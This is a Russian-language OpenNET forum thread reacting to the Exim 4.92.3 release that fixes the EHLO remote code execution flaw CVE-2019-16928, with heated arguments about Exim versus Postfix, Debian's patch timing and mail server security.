The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]



"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от opennews (?), 29-Сен-19, 21:03 
Опубликован экстренный выпуск почтового сервера Exim 4.92.3 с устранением очередной критической уязвимости (CVE-2019-16928), потенциально позволяющей удалённо выполнить свой код на сервере через передачу специально оформленной строки в команде EHLO. Уязвимость проявляется на стадии после сброса привилегий и ограничена выполнением кода с правами непривилегированного пользователя, под которым выполняется обработчик поступающих сообщений...

Подробнее: https://www.opennet.ru/opennews/art.shtml?num=51590

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по времени | RSS]


1. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +15 +/
Сообщение от qqqqqq (?), 29-Сен-19, 21:03 
Когда твой почтовый сервер состоит из уязвимостей чуть менее, чем целиком.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

103. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +3 +/
Сообщение от Аноним (103), 30-Сен-19, 15:00 
То это Exchange!
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

108. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +2 +/
Сообщение от Я (??), 30-Сен-19, 17:40 
Как нам повезло что у нас postfix :)
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

2. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –4 +/
Сообщение от InuYasha (?), 29-Сен-19, 21:14 
Может, сайт Столлмана так и взломали?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

8. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –5 +/
Сообщение от Аноним (8), 29-Сен-19, 21:40 
Столлман сам себя взлом чтобы его пожалели.
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

97. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (97), 30-Сен-19, 13:15 
> Может, сайт Столлмана так и взломали?

Нет, у FSF Exim 4.69, который слишком стар для этой дыры.
Там кто-то с легальными админскими полномочиями поработал, то есть, сотрудник FSF. Не все в FSF одобряют жёсткую позицию Столлмана по отношению к корпорациям и проприетарщине.

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

128. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (128), 01-Окт-19, 16:10 
как завуалировано вы завернули простую фразу "нашлась крыса, возможно, за деньги"
Ответить | Правка | ^ к родителю #97 | Наверх | Cообщить модератору

3. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от бублички (?), 29-Сен-19, 21:20 
помню одному чудаку на букву М (тогдашний мой руководитель), я ещё в 2012-м говорил про дырявость Exim. а ведь в ту пору был чуть-ли не первый звоночек по этой теме. Саша, надеюсь ты до сих пор читаешь OpenNET и до сих пользуешься этой дырой, а заодно и ISPadmin без которого ты с почтовым сервером в жизни не умел работать. но ведь не менять же политику компании (то-есть твою политику) из-за какой-то там единичной дыры - так ты говорил? надеюсь и Dovecot ты до сих пор настроить не умеешь (число одновременных соединений), утверждая что де мол всё работало годами без всяких дополнительных настроек. я за полгода работы с тобой понял что это не лечится
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

85. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –1 +/
Сообщение от Аноним (85), 30-Сен-19, 10:02 
Игорь, ты? Помнишь меня? Я твой одноклассник. Я узнал тебя..
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

95. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (95), 30-Сен-19, 13:08 
https://cs6.pikabu.ru/images/big_size_comm/2015-08_1/1438553...
Ответить | Правка | ^ к родителю #85 | Наверх | Cообщить модератору

102. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –2 +/
Сообщение от MooSE (ok), 30-Сен-19, 14:53 
Любой софт может содержать уязвимости. Если не ошибаюсь то время от времени в любом MTA находят дыры. И вопрос тут скорее не в выборе софта, а в том как быстро вы можете накатить патчи.

А вы рассуждаете немного по-детски. Извините если это вас ранит.

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

105. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (97), 30-Сен-19, 15:35 
> Любой софт может содержать уязвимости. Если не ошибаюсь то время от времени в любом MTA находят дыры. И вопрос тут скорее не в выборе софта, а в том как быстро вы можете накатить патчи.

Вопрос скорее в том, как часто и насколько серьёзные дыры находят. В Exim только в этом годы нашли четыре remote code execution. Postfix и Sendmail явно не дотягивают до этого уровня дырявости.

Ответить | Правка | ^ к родителю #102 | Наверх | Cообщить модератору

121. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –1 +/
Сообщение от Аноним (121), 01-Окт-19, 02:40 
Вот только sendmail уже не развивается. Вроде, лет 5 как помер. И дырки там не особо ищут, потому что пользуются реже чем в былые времена.
Ответить | Правка | ^ к родителю #105 | Наверх | Cообщить модератору

109. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Я (??), 30-Сен-19, 17:41 
Что-то не припоминаю наличие дыр у postfix, напомните?
Ответить | Правка | ^ к родителю #102 | Наверх | Cообщить модератору

124. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от анон (?), 01-Окт-19, 12:26 
https://vulners.com/exploitdb/EDB-ID:34896
Ответить | Правка | ^ к родителю #109 | Наверх | Cообщить модератору

125. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от uldus (ok), 01-Окт-19, 12:43 
Это эксплоит для уязвимости в Bash (https://www.opennet.ru/opennews/art.shtml?num=40667), а не в Postfix. Посмотретие приведённые там CVE, да и само название Shellshock SMTP Exploit об этом говорит.

Эксплоит лишь протестирован с postfix в связке с procmail. Ключевое слово здесь procmail, через который и эксплуатируется bash. Чистый Postfix не позволяет атаковать, если не испльзуются прослойки типа procmail.

При небольшой переработке этот эксплоит может быть использован с _любыми_ сервисами на системах с дырявым bash, которые выставляют переменные окружения, в том числе c OpenSSH, qmail, exim, openvpn и т.д.

Ответить | Правка | ^ к родителю #124 | Наверх | Cообщить модератору

131. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от red75prim (?), 02-Окт-19, 08:19 
Дык. Они там сишечку обрезали, zero-terminated строки повыдёргивали, огородили всякими safe API, разбили на кучу процессов, упростив тем управление памятью и улучшив надёжность. Вот. И почему только все так не пишут?
Ответить | Правка | ^ к родителю #109 | Наверх | Cообщить модератору

111. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от бублички (?), 30-Сен-19, 21:17 
не ранит ничуть, иначе не писал бы публично. вопрос тут не в выборе софта и не в оперативности обновления. вопрос лишь в упёртости и лени, которой придумывают совершенно фантастические оправдания (политика компании). а упёртость на мой взгляд хороша лишь вкупе с осведомлённостью, но не с безграмотностью и ленью
Ответить | Правка | ^ к родителю #102 | Наверх | Cообщить модератору

122. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –2 +/
Сообщение от dotgggff (?), 01-Окт-19, 07:11 
женя? как ты был злбным * так и остался
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

126. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от бублички (?), 01-Окт-19, 13:52 
мимо. но я знал, реакция будет. задел довольно актуальный случай глупого упрямства со стороны руководства технического отдела против мнения специалиста
Ответить | Правка | ^ к родителю #122 | Наверх | Cообщить модератору

123. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –2 +/
Сообщение от anonymousr (?), 01-Окт-19, 08:42 
Незрелость как специалиста на лицо. Удачи на фрилансе!
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

127. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от бублички (?), 01-Окт-19, 14:04 
> Удачи на фрилансе!

если это мне - то никогда не занимался, но всё-равно спасибо

> Незрелость как специалиста на лицо

ты никогда не сталкивался с необразованным и безграмотным руководством (в данном случае технический директор), которое не имея конкретной работы, от скуки всюду суёт свой нос и норовит заявить о себе в любой сфере (от бух. учёта и до разработки веб-приложений) как о специалисте высшей категории? типа "вот вы тут все работаете, но я то выше вас всех вместе взятых - не забывайте об этом". столкнёшься и не раз, коль уж про фриланс заговорил

Ответить | Правка | ^ к родителю #123 | Наверх | Cообщить модератору

129. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (129), 02-Окт-19, 00:30 
Дружище, а из-за чего у тебя подгорает спустя столько лет? Не правильней ли отпустить его и жить своей жизнью?
Ответить | Правка | ^ к родителю #127 | Наверх | Cообщить модератору

132. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от бублички (?), 02-Окт-19, 10:30 
> Дружище, а из-за чего у тебя подгорает спустя столько лет? Не правильней
> ли отпустить его и жить своей жизнью?

новость напомнила. выругался и живу дальше

Ответить | Правка | ^ к родителю #129 | Наверх | Cообщить модератору

4. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –3 +/
Сообщение от Michael Shigorinemail (ok), 29-Сен-19, 21:24 
#!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

62. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +3 +/
Сообщение от Аноним (62), 30-Сен-19, 01:18 
Шигopинa спросить забыли.
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

78. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от fske (?), 30-Сен-19, 08:19 
Как бомбануло! Туши скорее!!!
Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору

5. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –3 +/
Сообщение от zzz (??), 29-Сен-19, 21:28 
>Проблема пока остаётся неисправленной в Debian

Дебиан - это надежно.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

15. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –1 +/
Сообщение от бублички (?), 29-Сен-19, 22:32 
Exim4 не входит в базовую (начальную) установку Debian 10 (Buster). ну а после того как ты сам проделал "apt-get install exim4", ответственность за это рукоблудие уже всецело твоя. в Debian же на выбор преложены и Postfix и Sendmail и даже Qmail. спасение утопающих дело рук самих утопающих
Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

20. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –1 +/
Сообщение от zzz (??), 29-Сен-19, 22:41 
Дистр, позиционирующий себя как стабильный для серьезного продакшна, одним из последних латает дыры, а виноват опять пользователь этого дистра? У вас там совсем шарики за ролики заехали? Убунтенок укусил?
Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

27. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –9 +/
Сообщение от пох. (?), 29-Сен-19, 22:52 
> Exim4 не входит в базовую (начальную) установку Debian 10

стесняюсь спросить - а какой mta в нее вообще входит-то? Аа, никакого, да?

Ну правильно, зачем всяким кроновским скриптам портить спокойный сон девляпса (и вообще они немодно, таймеры сцыстемды-то не нуждаются в почтовой системе).

> ну а после того как ты сам проделал "apt-get install exim4"

опубликуйте весь список пакетов, которые нельзя apt-get install в де6иллиане, чтобы не нарваться на неумение их майнтейнеров отслеживать обновления безопасности. Желательно с пруфами, что список исчерпывающий.

А то пока в этом списке 1. весь де6иллиан

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

94. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (97), 30-Сен-19, 13:02 
У девляпсов логи (включая таймеры сцыстемды) собираются в через ELK и анализируются prometheus exporter-ом, так что в случае чего в графане алерты загораются.
Так что да, из MTA нужен только postfix на 127.0.0.1, чтобы всякое легаси не обижалось.
Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

89. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (97), 30-Сен-19, 12:43 
> Exim4 не входит в базовую (начальную) установку Debian 10 (Buster).

С каких это пор?
https://wiki.debian.org/PkgExim4
> Exim is the MTA (Mail Transfer Agent) installed by default on new debian installations.

 

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

66. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +5 +/
Сообщение от Аноним (66), 30-Сен-19, 01:38 
А ты и поверил тому, что в новости написали? Мне утром 29-го исправление прилетело, и по ссылке написано, что в buster(security) fixed.
Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

92. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (97), 30-Сен-19, 12:56 
> Проблема пока остаётся неисправленной в Debian

https://www.debian.org/security/2019/dsa-4536
> Дата сообщения: 28.09.2019
> Ссылки на базы данных по безопасности: В каталоге Mitre CVE: CVE-2019-16928.

Поменьше верьте новостям, в них регулярно фигню пишут.

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

104. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (104), 30-Сен-19, 15:00 
Перед обедом не читать опеннет?
Ответить | Правка | ^ к родителю #92 | Наверх | Cообщить модератору

106. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (97), 30-Сен-19, 15:38 
Читать-то можно, почему бы и нет. А вот всерьёз воспринимать — не советую.
Действует то же правило, что и с прочими СМИ — если какой-то факт вызвал у вас возмущение, проверьте его по независимым источникам.
Ответить | Правка | ^ к родителю #104 | Наверх | Cообщить модератору

115. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (115), 30-Сен-19, 22:49 
На момент публикации новости  в https://security-tracker.debian.org/tracker/CVE-2019-16928
Строка "buster (security)" была помечена как vulnerable
Ответить | Правка | ^ к родителю #92 | Наверх | Cообщить модератору

6. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (6), 29-Сен-19, 21:32 
Exim в критической инфраструктуре использовать нельзя.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

11. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –2 +/
Сообщение от Аноним (11), 29-Сен-19, 21:53 
EPEL (CentOS тоже)
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

93. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (97), 30-Сен-19, 12:57 
А мы центось используем, хаха. И ничего, живы пока.
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

118. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –1 +/
Сообщение от Аноним (11), 30-Сен-19, 23:40 
Но попу свою лучше протрите.
Ответить | Правка | ^ к родителю #93 | Наверх | Cообщить модератору

13. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +1 +/
Сообщение от Аноним (13), 29-Сен-19, 22:21 
*любой почтовый сервер
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

28. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –4 +/
Сообщение от MS (??), 29-Сен-19, 22:53 
ну что вы, что вы, не любой. Exchange - можно!

Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

41. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –3 +/
Сообщение от Michael Shigorinemail (ok), 29-Сен-19, 23:15 
> ну что вы, что вы, не любой. Exchange - можно!

...спрятав за... за...

Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

44. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от MS (??), 29-Сен-19, 23:21 
за наш Exchange Online Protection, разумеется!

Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

79. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от fske (?), 30-Сен-19, 08:25 
Стесняюсь спросить, а что же перед Exchange Online Protection? Или приобрели стальные яйца?
Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

88. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от f (??), 30-Сен-19, 12:11 
А что не так? А, эксчендж должен за экзимом работать.
Ответить | Правка | ^ к родителю #79 | Наверх | Cообщить модератору

107. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –2 +/
Сообщение от fske (?), 30-Сен-19, 16:54 
решетo за решетoм? а ты юморист...
Ответить | Правка | ^ к родителю #88 | Наверх | Cообщить модератору

14. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Тот самый (?), 29-Сен-19, 22:25 
> Exim в критической инфраструктуре использовать нельзя

Экий бред!

Следуя этой логике нельзя использовать openssl, openssh, mysql, postgres, postfix, etc. У всех были периоды, когда открывалась одна дыра за другой. Обновляться вовремя - это проблема?

Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

17. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +4 +/
Сообщение от бублички (?), 29-Сен-19, 22:39 
дыра за дырой в Postfix? да вы, голубчик, фантазёр. и что, всё сплошь remote code execution по типу как в Exim?
Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

23. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –10 +/
Сообщение от zzz (??), 29-Сен-19, 22:47 
Если в софте не находят дыры, значит этим софтом никто не пользуется. Более того, это не значит, что для этого софта нет приватных эксплоитов и что твой сервак не имеют, пока ты пышаешься отсутствием публичных CVE.
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

30. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от бублички (?), 29-Сен-19, 22:53 
у тебя (как и у многих здесь) попросту бред преследования в виду отстутствия знаний и навыков. регулярно наблюдаю как подобные новости взрывают всей вашей секте мозг, и вы во все трубы рады трубить о каких-то несуществующих приватынх эксплойтах (приведи хоть какое-то доказательство!) и даже берётесь утверждать совсем уже несусветную чушь (Postfix никто не пользуется). сам то перечитай что пишешь хоть иногда, ну галиматья абсолютная
Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

38. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –2 +/
Сообщение от zzz (??), 29-Сен-19, 23:07 
Забыл про уязвимость в RDP, эксплоит для которого год циркулировал из рук в руки? EternalBlue? И вообще всю ту пачку эксплоитов от АНБ? Зато гонору на десятерых.
Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

42. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от бублички (?), 29-Сен-19, 23:16 
что куришь и где покупаешь? очень уж кучеряво пишешь - начинаешь с сыра и заканичваешь луной. давай по порядку. новость про RCE-уязвимость в Exim - 4-ю за год. так? за последние 5-10 лет их было около 10. так? где хоть что-то подобное про Postfix? в RDP же дыр всегда было полно, найди и посчитай сам
Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

46. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –4 +/
Сообщение от zzz (??), 29-Сен-19, 23:36 
А как сладко пел - несуществующие приватные эксплойты, бред преследования. Слив засчитан.

Далее, я про постфикс слова не сказал. Я сказал "Если в софте не находят дыры, значит этим софтом никто не пользуется". У тебя какие-то проблемы с самооценкой, что ты всё принимаешь на свой счет?

Идем дальше. За последний год в постгрессе было два RCE, в мускуле - ни одного. И что? Все должны дружно встать и сказать "Да ну этот постгри, перекатываемся на мускул!", потому что бублички ответственно заявляет - раз больше одной RCE, значит софт гно? К чему вообще эти патетичные фразы с известными всем цифрами?

Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

53. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от бублички (?), 30-Сен-19, 00:07 
не пойму, к чему весь этот твой астрономических масштабов бред про чёрные дыры в далёких галактиках? давай всё-таки про Postfix. новость про дырявый Exim, ну а я сторониик Postfix. ты намекнул про приватные эксплойты. давай, разверни тему, срази меня фактами
Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

58. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –4 +/
Сообщение от zzz (??), 30-Сен-19, 00:42 
Астанавись, ты несешь ахинею из-за постзнания. В прошлом, позапрошлом, позапозапрошлом RCE не были обнаружены, и всем всё было нормально, Exim - нормальный почтовик, никаких претензий. В этом году вышли RCE - и местные кукаретики прозрели: и код-то фуфло, и почтовик-то жуть какой небезопасный, и ваще надо срочнейше перекатываться на постфикс. Белки-истерички.
Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

59. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от бублички (?), 30-Сен-19, 00:48 
вот только первые RCE в нём были ещё так примерно в 2004-2006, именно тогда я от него отказался раз и навсегда. все остальные могли бы сделать то же самое. потому лишь сами виноваты
Ответить | Правка | ^ к родителю #58 | Наверх | Cообщить модератору

81. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –1 +/
Сообщение от suffix (ok), 30-Сен-19, 08:45 
Честно говоря - надуманные ваши стенания. Ничего полохого за postfix не скажу, но что Вы так на exim-то накинулись ? Мне он удобнее - следишь за новостями - обновляешься вовремя - проблемы то в чём ?
Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

86. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +2 +/
Сообщение от DIO (?), 30-Сен-19, 11:06 
вообще стенания на тему чье кунгфу круче выглядят не оченнь. тем более когда ттак слабоаргументировано топят на постфикс. нет ни в экзиме ни в ппостфиксе ничего плохого. это тот случай когда выбирают запах тюльпанов - красных или фиолетвых :)
ИМХО: экзим хорош когда надо сильно выпендриваться, у постфикса в таком случае обычно надо делать либо бреинсторм либо "нестандартные решения".
Обычно постфикс (чаще) используют когда собрал и ничего не настраивая что-то работает, экзим обычно берут тогда когда надо что-то больше чем "просто чтобы почта ходила". Оба MTA хорошо работают с большой нагрузкой и когда ставится задача по выбору для решения высоконагруженой и/или "тяжелой" задачи то квалификация админа(-ов) обычно не мучит выбором, кроме того в списке для выбора почто-серверов появляются еще участники и главное что люди думают о схеме построения (речь о много серверов и отдельными серверами на смтп, отдельно на фильтра, отдбельно на поп3/имап и т.д.)
Ответить | Правка | ^ к родителю #81 | Наверх | Cообщить модератору

87. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –1 +/
Сообщение от Аноним (87), 30-Сен-19, 11:49 
Если postfix такой хороший то почему его не ставят?
Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

33. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –6 +/
Сообщение от пох. (?), 29-Сен-19, 22:55 
> Обновляться вовремя - это проблема?

в дистрибутивах, где майнтейнеры - ленивые рукожопы, selinux ни разу не предусмотрен, "зато у нас только шва6одный софт" - безусловно, проблема.

Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

96. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –1 +/
Сообщение от Аноним (97), 30-Сен-19, 13:12 
А в тех дистрибутивах, где мейнтейнеры не ленивые и selinux включают — юзеры регулярно бегают с криками "ааа, у меня непонятные баги, permission denied, хотя с правами и ACL всё нормально!!!1", а потом "как отключить это бл*ский selinux?"
Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

114. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –2 +/
Сообщение от пох. (?), 30-Сен-19, 22:13 
тyпорылые "юзеры" и должны ведь - страдать?

Ответить | Правка | ^ к родителю #96 | Наверх | Cообщить модератору

116. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +1 +/
Сообщение от бублички (?), 30-Сен-19, 23:26 
даже у них есть выбор:

- читать документацию и развиваться
- наслаждаться нескучными обоями Windows (MacOS, и т.д.)
- страдать и ежедневно ныть на OpenNET

Ответить | Правка | ^ к родителю #114 | Наверх | Cообщить модератору

18. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –1 +/
Сообщение от Аноним (18), 29-Сен-19, 22:39 
А какой почтовик норм?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

29. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –3 +/
Сообщение от Alexeyemail (??), 29-Сен-19, 22:53 
OpenSMTPD
Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

36. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +3 +/
Сообщение от Alexeyemail (??), 29-Сен-19, 23:02 
кто минусует, тот - обоснуй!
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

31. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +6 +/
Сообщение от почта россии (?), 29-Сен-19, 22:53 
наш!
Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

37. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Alexeyemail (??), 29-Сен-19, 23:03 
Эксчендж, что ль?
Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

43. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Анонес (?), 29-Сен-19, 23:16 
ваш пакеты теряет
Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

49. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от НяшМяш (ok), 29-Сен-19, 23:51 
Ладно пакеты, иногда целые отделения теряются. Понадобилось впервые за 5 лет получить пакет, а оказалось, что моё отделение уже 3 года на ремонт закрыто и надо тащиться за километр в другой район )
Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

80. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –1 +/
Сообщение от Р (?), 30-Сен-19, 08:31 
Это твоя карма,
Ответить | Правка | ^ к родителю #49 | Наверх | Cообщить модератору

83. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от почта россии (?), 30-Сен-19, 09:52 
ну бывает - теряет, бывает дропает - как будто у вас не теряет.

И вообще, мущина, если так беспокоитесь - отправляйте первым классом с описью вложения, ПАКЕТ НЕ ЗАПЕЧАТЫВАЕМ!, или отойдите, не занимайте окошко.

Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

90. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от СеменСеменыч777 (?), 30-Сен-19, 12:50 
отправления первого класса - обман народа. ничем не лучше заказных писем.
Ответить | Правка | ^ к родителю #83 | Наверх | Cообщить модератору

101. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –2 +/
Сообщение от почта россии (?), 30-Сен-19, 14:34 
мущина, ПИСЬМО - это которое на бумаге пишут! А ваш гардероб в конверт не поместится! Да я вижу что он разобранный - НЕТ, все равно не войдет! И это не почтовый ящик, это мусорка! Ящик - воон там, да, в ту щель должно помещаться. А вам - воон в то окошко, оформляйте, не задерживайте очередь, не вы тут самый умный, мы вас таких по сто штук в день видим!

Ответить | Правка | ^ к родителю #90 | Наверх | Cообщить модератору

47. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –1 +/
Сообщение от Аноним (11), 29-Сен-19, 23:40 
Nodemailer и Haraka
Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

48. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +1 +/
Сообщение от Alexeyemail (??), 29-Сен-19, 23:48 
пошутил? генетически ущербные мейлер и сервер с унаследованными дырами из лепрозория node.js?
Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

84. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (84), 30-Сен-19, 09:52 
зато не ломанут - кто ж в этой помойке полезет копаться? Ну будет еще немножечко майнить по выходным, тебе жалко?
Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

56. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Ward (?), 30-Сен-19, 00:26 
Binkd и binkleyforce ж
Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

77. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +5 +/
Сообщение от хотел спросить (?), 30-Сен-19, 06:47 
Юзаю postfix + dovecot

Вроде неплохо...

Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

110. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (110), 30-Сен-19, 19:27 
За файрволом
Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

40. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (40), 29-Сен-19, 23:09 
Тю, так неинтересно. Зайду, думаю, обновлю - а там уже и так всё новое. Люблю unattended-upgrades :)
P.S. в Debian 10 фикс есть уже, если что.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

82. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от imho (ok), 30-Сен-19, 09:47 
Оказывается уже 2019-09-06 прилетало. В логах:

> SMTP protocol error in "AUTH CRAM-MD5" H=(mmmmbbbb…
